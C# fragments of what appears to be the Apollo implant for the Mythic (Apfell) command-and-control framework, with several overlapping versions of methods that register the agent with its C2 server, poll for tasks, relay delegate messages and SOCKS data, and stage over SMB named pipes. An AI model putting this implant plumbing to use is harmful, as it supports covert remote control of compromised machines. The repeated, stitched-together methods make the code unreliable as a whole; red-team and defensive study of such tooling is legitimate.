/// <summary>
/// Register the agent with the Apfell server.
/// </summary>
/// <param name="agent">The agent to register with the server.</param>
/// <returns>UUID of the newly registered agent.</returns>
override public string RegisterAgent(Apollo.Agent agent)
{
// Get JSON string for implant
DebugWriteLine("Attempting to serialize agent...");
string json = JsonConvert.SerializeObject(agent);
DebugWriteLine($"[+] InitializeImplant - Sending {json}");
string id = Guid.NewGuid().ToString();
if (Send(id, json))
{
DebugWriteLine("Successfuly sent registration message!");
string result = (string)Inbox.GetMessage(id);
if (result.Contains("success"))
{
// If it was successful, initialize implant
// Response is { "status": "success", "id": <id> }
JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
string newUUID = resultJSON.Value <string>("id");
cryptor.UpdateUUID(newUUID);
return(newUUID);
}
else
{
throw (new Exception("Failed to retrieve an ID for new callback."));
}
}
return("");
}
public override string RegisterAgent(Apollo.Agent agent)
{
// Get JSON string for implant
string json = JsonConvert.SerializeObject(agent);
string result;
string id = Guid.NewGuid().ToString();
//string result = Send(json);
DebugWriteLine($"Sending registration message with ID {id}...");
if (Send(id, json))
{
DebugWriteLine($"SUCCESS! Sent registration message with ID {id}");
DebugWriteLine($"Waiting for reply to registration message with ID {id}...");
result = (string)Inbox.GetMessage(id);
DebugWriteLine($"SUCCESS! Got reply to registration message with ID {id}...");
if (result.Contains("success"))
{
// If it was successful, initialize implant
// Response is { "status": "success", "id": <id> }
JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
string newUUID = resultJSON.Value <string>("id");
cryptor.UpdateUUID(newUUID);
return(newUUID);
}
}
else
{
throw (new Exception("Failed to retrieve an ID for new callback."));
}
return("");
}
public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
Structs.TaskQueue result;
List <Task> finalTaskList = new List <Task>();
List <Structs.DelegateMessage> finalDelegateList = new List <Structs.DelegateMessage>();
Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Structs.CheckTaskingResponse>(GetTaskingMessage());
foreach (Task task in resp.tasks)
{
Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
finalTaskList.Add(task);
}
if (resp.delegates != null)
{
foreach (Dictionary <string, string> delegateMessage in resp.delegates)
{
foreach (KeyValuePair <string, string> item in delegateMessage)
{
finalDelegateList.Add(new Structs.DelegateMessage()
{
UUID = item.Key,
Message = item.Value
});
}
}
}
result = new Structs.TaskQueue()
{
Tasks = finalTaskList.ToArray(),
Delegates = finalDelegateList.ToArray()
};
//result.Add("tasks", finalTaskList.ToArray());
//result.Add("delegates", finalDelegateList.ToArray());
//SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json));
return(result);
}
public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
Structs.TaskQueue result;
List <Task> finalTaskList = new List <Task>();
List <Structs.DelegateMessage> finalDelegateList = new List <Structs.DelegateMessage>();
Structs.CheckTaskingRequest req = new Structs.CheckTaskingRequest()
{
action = "get_tasking",
tasking_size = 1
};
if (DelegateMessageRequestQueue.Count > 0)
{
DelegateMessageRequestMutex.WaitOne();
req.delegates = DelegateMessageRequestQueue.ToArray();
DelegateMessageRequestQueue.Clear();
//DelegateMessageQueue = new List<Dictionary<string, string>>();
DelegateMessageRequestMutex.ReleaseMutex();
}
// Could add delegate post messages
string json = JsonConvert.SerializeObject(req);
string taskingId = Guid.NewGuid().ToString();
if (Send(taskingId, json))
{
string response = (string)Inbox.GetMessage(taskingId);
Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Mythic.Structs.CheckTaskingResponse>(response);
foreach (Task task in resp.tasks)
{
Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
finalTaskList.Add(task);
}
if (resp.delegates != null)
{
foreach (Dictionary <string, string> delegateMessage in resp.delegates)
{
foreach (KeyValuePair <string, string> item in delegateMessage)
{
finalDelegateList.Add(new Structs.DelegateMessage()
{
UUID = item.Key,
Message = item.Value
});
}
}
}
}
result = new Structs.TaskQueue()
{
Tasks = finalTaskList.ToArray(),
Delegates = finalDelegateList.ToArray()
};
//result.Add("tasks", finalTaskList.ToArray());
//result.Add("delegates", finalDelegateList.ToArray());
//SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json));
return(result);
}
public abstract Structs.TaskQueue GetMessages(Apollo.Agent agent);
//public abstract string PostResponse(Structs.DownloadFileRegistrationMessage taskresp);
public abstract string RegisterAgent(Apollo.Agent agent);
/// <summary>
/// Check Apfell endpoint for new task
/// </summary>
/// <returns>CaramelTask with the next task to execute</returns>
override public Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
Stopwatch sw = new Stopwatch();
sw.Start();
//DebugWriteLine("Attempting to send SOCKS datagrams...");
//SendSocksDatagrams();
sw.Stop();
DebugWriteLine($"SendSocksDatagrams took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
sw.Restart();
//DebugWriteLine("Sent all SOCKS datagrams!");
TaskQueue response = new TaskQueue();
List <Task> finalTaskList = new List <Task>();
List <DelegateMessage> finalDelegateMessageList = new List <DelegateMessage>();
CheckTaskingRequest req = new CheckTaskingRequest()
{
action = "get_tasking",
tasking_size = -1
};
if (DelegateMessageRequestQueue.Count > 0)
{
DelegateMessageRequestMutex.WaitOne();
req.delegates = DelegateMessageRequestQueue.ToArray();
DelegateMessageRequestQueue.Clear();
DelegateMessageRequestMutex.ReleaseMutex();
}
else
{
req.delegates = new Dictionary <string, string>[] { };
}
// Could add delegate post messages
string json = JsonConvert.SerializeObject(req);
string id = Guid.NewGuid().ToString();
if (Send(id, json))
{
string returnMsg = (string)Inbox.GetMessage(id);
//JObject test = (JObject)JsonConvert.DeserializeObject(returnMsg);
////Dictionary<string, object>[] testDictTasks = test.Value<Dictionary<string, object>[]>("tasks");
//Task[] testTasks = test.Value<Task[]>("tasks");
Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Mythic.Structs.CheckTaskingResponse>(returnMsg);
if (resp.tasks != null)
{
foreach (Task task in resp.tasks)
{
Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
finalTaskList.Add(task);
}
}
if (resp.delegates != null)
{
foreach (Dictionary <string, string> delmsg in resp.delegates)
{
string uuid = delmsg.Keys.First();
finalDelegateMessageList.Add(new DelegateMessage()
{
UUID = uuid,
Message = delmsg[uuid]
});
}
}
if (resp.socks != null)
{
response.SocksDatagrams = resp.socks;
}
}
response.Delegates = finalDelegateMessageList.ToArray();
response.Tasks = finalTaskList.ToArray();
sw.Stop();
DebugWriteLine($"Get tasking took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
//SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json));
return(response);
}
public override Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
{
throw new NotImplementedException();
}
public override string RegisterAgent(Apollo.Agent agent)
{
// Get JSON string for implant
string json = JsonConvert.SerializeObject(agent);
byte[] reqPayload = Encoding.UTF8.GetBytes(base.cryptor.Encrypt(json));
if (holdConnection)
{
serverStream.Close();
serverStream = CreateNamedPipeServer();
holdConnection = false;
}
serverStream.WaitForConnection();
holdConnection = true;
Thread t = new Thread(() => ReadAndSortMessages());
t.Start();
SMBMessage uuidRegistration = new SMBMessage()
{
MessageType = "uuid_registration",
MessageObject = base.cryptor.GetUUIDBytes()
};
// This is the payload uuid, so we need to stage and get the new one
if (base.cryptor.GetUUIDString() == baseUUID)
{
//uuidRegistration.MessageType = "staging_uuid_registration";
uuidRegistration.MessageObject = Encoding.UTF8.GetBytes("staging-" + base.cryptor.GetUUIDString());
SMBMessage registerMsg = new SMBMessage()
{
MessageType = "register",
MessageObject = reqPayload
};
// Get JSON string for implant
//string result = Send(registrationId, registerMsg);
string result;
DebugWriteLine($"Sending uuid_registration message to client...");
Send(uuidRegistration);
DebugWriteLine($"SUCCESS! Sent uuid_registration message!");
DebugWriteLine($"Sending Apfell registration message to client...");
if (Send(registerMsg))
{
DebugWriteLine($"SUCCESS! Sent Apfell registration message!");
DebugWriteLine($"Waiting for initial checkin response from Apfell server...");
result = (string)Inbox.GetMessage("checkin");
DebugWriteLine($"SUCCESS! Got initial checkin response from Apfell server!\n\t{result}");
if (result.Contains("success"))
{
// If it was successful, initialize implant
// Response is { "status": "success", "id": <id> }
JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
string newUUID = resultJSON.Value <string>("id");
base.cryptor.UpdateUUID(newUUID);
SMBMessage notifyRelayMessage = new SMBMessage()
{
MessageType = "uuid_registration",
MessageObject = Encoding.UTF8.GetBytes(newUUID)
};
// Do something with bool?
Send(notifyRelayMessage);
return(newUUID);
}
else
{
throw (new Exception("Failed to retrieve an ID for new callback."));
}
}
return("");
}
else
{
// we've already got an agent uuid, return that.
Send(uuidRegistration);
return(base.cryptor.GetUUIDString());
}
}
